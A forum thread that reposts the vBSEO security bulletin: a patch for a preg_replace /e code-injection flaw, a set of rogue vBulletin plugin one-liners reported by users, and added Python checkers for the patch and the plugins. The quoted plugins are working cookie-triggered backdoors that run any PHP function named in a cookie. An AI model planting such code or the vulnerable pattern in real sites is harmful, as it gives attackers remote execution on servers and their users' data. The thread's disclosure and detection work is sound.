Dear Customers and Friends,

An exploit has come to our attention that necessitates the release of a Patch for all currently supported versions, including

- vBSEO 3.6.0
- vBSEO 3.5.2
- vBSEO 3.5.1 (including PL release)
- vBSEO 3.5.0

Versions below 3.5.0 are no longer supported and have met end of life. If you are running 3.5.0 or lower, it is highly suggested that you upgrade to a newer build immediately.

All of the above install packages in the downloads area have been updated should you wish to re-install the entire product. Version numbers have not changed, and there will be no "PL" designation with this update.

Otherwise, the simple fix is to edit the file

Code:
/vbseo/includes/functions_vbseocp_abstract.php

Find:

PHP:
public static function proc_deutf($ptxt, $tocharset)
{
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
    return $ptxt;
}

Replace with:

PHP:
public static function proc_deutf($ptxt, $tocharset)
{
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
    return $ptxt;
}

Please take immediate action to protect your sites.

IMPORTANT

It has been reported that some sites have had random plugins show up in their plugin list in the vB adminCP. Please take the time to go through your plugin list. If you do see anything that doesn't look familiar, it may be wise to disable that plugin while troubleshooting further. Most reports have been tied to the global_complete hook under the core 'vBulletin' product, but may also be elsewhere.

We are unsure of any implications or ramifications that may have resulted, as an infinite of code or text may have been injected. However, what we have seen appears to be a link-stealer for outbound traffic and doesn't necessarily expose any information or passwords of your site.
It is always a good idea to update your ftp, server, vb admin, vbseocp, and even any htaccess passwords on your server as a precaution.

If you find any more information about the issue, please do bring it to our attention ASAP so it can be addressed. If you have any questions, please feel free to open up a ticket or thread and we will be glad to assist further.

Thank you,
The vBSEO Team

http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/

Also it looks like a rogue plugin has been popping up a lot. Remove this if you have it!

vbCMS Global Thread Cache
PHP:
/* vBCMS Global Thread Cache */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
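Because the bulletin says version numbers did not change, the only way to tell whether an install carries the fix is to inspect the file it names. The following is an added example, not vBSEO's code and not part of the original posts, that classifies the source text of functions_vbseocp_abstract.php by how the backreference is quoted inside proc_deutf. The function name `patch_state` and the two sample strings (built from the "Find" and "Replace with" blocks above) are constructed for illustration.

```python
import re

# Constructed input: proc_deutf as quoted in the bulletin's "Find" block.
BEFORE = r"""public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}"""
# Constructed input: the "Replace with" block differs only in how $1 is quoted.
AFTER = BEFORE.replace('"$1"', r"\'$1\'")

def patch_state(php_source):
    """Return 'missing', 'vulnerable', 'patched' or 'unknown' for proc_deutf."""
    start = re.search(r"function\s+proc_deutf\s*\(", php_source)
    if not start:
        return "missing"
    # The function is short, so its return statement bounds the body.
    end = php_source.find("return $ptxt", start.end())
    body = php_source[start.end(): end if end != -1 else len(php_source)]
    # Only a pattern with the e modifier has its replacement evaluated as PHP.
    if not re.search(r"#[a-z]*e[a-z]*'\s*,", body):
        return "unknown"
    # Unpatched form: the backreference sits inside a double-quoted PHP string.
    if re.search(r'"\$\d+"', body):
        return "vulnerable"
    # Patched form: every backreference sits inside escaped single quotes.
    if re.search(r"\\'\$\d+\\'", body):
        return "patched"
    return "unknown"

if __name__ == "__main__":
    import sys
    # Pass one or more copies of functions_vbseocp_abstract.php as arguments.
    for path in sys.argv[1:]:
        with open(path, encoding="latin-1") as fh:
            print(path, patch_state(fh.read()))
    if len(sys.argv) == 1:
        print("Find block:", patch_state(BEFORE))
        print("Replace block:", patch_state(AFTER))
```
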
It looks like there are several bad plugins floating around... Like the one above but with this code.

vBulletin Templates Cookie Caching
PHP:
/* vBulletin Templates Cookie Caching */$vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&

also

PHP:
/* vBCMS Global Thread Cache */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20)

and

PHP:
/* vBulletin Dynamic Menu Filters */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

all these plugins should be removed IMHO if you see them listed
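A check for the plugin one-liners quoted in these posts, as an added example that is not from the thread or from vBSEO: it flags plugin records whose title matches one reported here, or whose code reads request data and also calls a function named by a variable, so a renamed copy is still caught. The record field names (`title`, `hookname`, `product`, `phpcode`) are assumptions about how the plugin list was exported, and the last three sample records are constructed.

```python
import re

# Plugin titles reported in this thread, lower-cased for comparison.
REPORTED_TITLES = {"vbcms global thread cache", "vbulletin templates cookie caching",
                   "vbulletin dynamic menu filters"}
REQUEST_INPUT = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST)\b")
# A call whose function name is held in a variable, e.g. $m[1](...) or $f(...).
DYNAMIC_CALL = re.compile(r"\$\w+(?:\s*\[[^\]]*\])*\s*\(")

def audit_plugin(plugin):
    """Return (verdict, reasons); verdict is 'remove', 'review' or 'ok'."""
    title_hit = plugin["title"].strip().lower() in REPORTED_TITLES
    reads_input = bool(REQUEST_INPUT.search(plugin["phpcode"]))
    dynamic = bool(DYNAMIC_CALL.search(plugin["phpcode"]))
    reasons = []
    if title_hit:
        reasons.append("title reported in this thread")
    if reads_input and dynamic:
        reasons.append("reads request data and calls a function named by a variable")
    elif reads_input:
        reasons.append("reads request data")
    if (plugin["hookname"], plugin["product"].lower()) == ("global_complete", "vbulletin"):
        reasons.append("global_complete hook under the core product")
    if title_hit or (reads_input and dynamic):
        return "remove", reasons
    return ("review" if reasons else "ok"), reasons

# The one-liner quoted in the posts above, held as inert text for matching only.
ROGUE = r'(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);'

# Constructed plugin records (hypothetical export of the adminCP plugin list).
SAMPLES = [
    {"title": "vBCMS Global Thread Cache", "hookname": "global_complete",
     "product": "vbulletin", "phpcode": "/* vBCMS Global Thread Cache */" + ROGUE},
    {"title": "Forum Stats Helper", "hookname": "init_startup",  # same code, renamed
     "product": "vbulletin", "phpcode": ROGUE},
    {"title": "Theme Picker", "hookname": "style_fetch",
     "product": "themepicker", "phpcode": '$t = isset($_COOKIE["theme"]) ? 1 : 0;'},
    {"title": "Sidebar Block", "hookname": "forumhome_start",
     "product": "sidebar", "phpcode": "$show_sidebar = true;"},
]

def report(plugins):
    return {p["title"]: audit_plugin(p)[0] for p in plugins}

if __name__ == "__main__":
    for title, verdict in report(SAMPLES).items():
        print(f"{verdict:7} {title}")
```

A "review" verdict only means the plugin touches request data or sits on the hook the bulletin singles out; it still needs a human read before anything is disabled.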
Here is a great post with some disturbing info about vbseo..

In the first few days of January, I found a plugin and a file I didn't recognize (it was one folder that I'd left write access on because SQLite was behaving odd and it was outside of the forum directory). I thought it was something related to an exploited SSO script for a company I won't name. Obviously that wasn't the case.

I love vbSEO in so many ways and have been using it for 4 years. I've been using it since early 2007 (under a different business) and credit it with the growth of two forums I've run, one of which I sold. I've been using vBulletin since 2000 and always wanted it to have a high-quality mod for rewriting URLs to match the rest of the review site I'd coded myself (not the current site I used it on).

Over at vBulletin.com...

kau runs a business that hosts vBSEO and non-vBSEO vBulletin forums:

Jafo said that he notified you of this exploit over a year ago:

It's one thing if you are a single mod maker who offers a vB Product/Plugin for free, donation or a low price, but you advertise yourself as a company for high traffic sites. Your response as of now is unacceptable for the type of company you claim to be.

Your company advertises itself as...

Our mental health forum does 600k uniques and 5 million pageviews a month (Google Analytics) and is of a sensitive nature. Now, I have to tell our users to clear their caches/cookies. Many will be understandably paranoid and concerned.

Now, I'm not naive. Of course things like this happen, but the important thing is how you choose to respond. Don't hand this off to vBulletin when plugin names like "vBCMS Global Thread Cache" are popping up all over as a result of the vBSEO exploit.
Take responsibility:

- Create a list of all the plugins/products (including the name and code) and other malicious files (for those that have writable directories) that are reported to you or you find yourself.
- Figure out exactly what the plugin/product/file exploits are doing yourself, with vBulletin or hire a security expert to figure it out.
- Tell people in a clear blog/forum post exactly what happened (you had fixed the exploit and then it got back into the code, right?), why it happened, why it won't happen again and what steps they need to take to find out how/if the exploit was used, how to remove the plugins/products, and how best to explain to their users (e.g. both the use of vBulletin's dismissible notices for logged in users and the wording of the Notice).
- Don't be like so many software, security and financial companies are. Instead, look at how LastPass responded to a *potential* breach. They didn't have to mention it because as far as they could tell, nothing had been compromised, but they chose to do the right thing and provided detailed instructions to their customers on what happened and how to act. Now you can even use Google Authenticator for two step verification with LastPass. Obviously, vBSEO's security isn't as critical as LastPass, but it doesn't mean you can't learn from them and do the right thing.

.... I see the thread is now closed
a post from Juan, the owner... Check out the post, there is more info as well as a tool to check your sites.
Just an FYI. If you were affected by this you will want to do some serious checking that your server doesn't have any backdoors installed. The plugin code is used to inject a stealth shell. Once the hacker runs it on your server he can do any number of bad things. It is a variant of a proof of concept that was created to show how easy it is to use cookies to inject a payload on a server. The interesting thing is it only takes one line of code.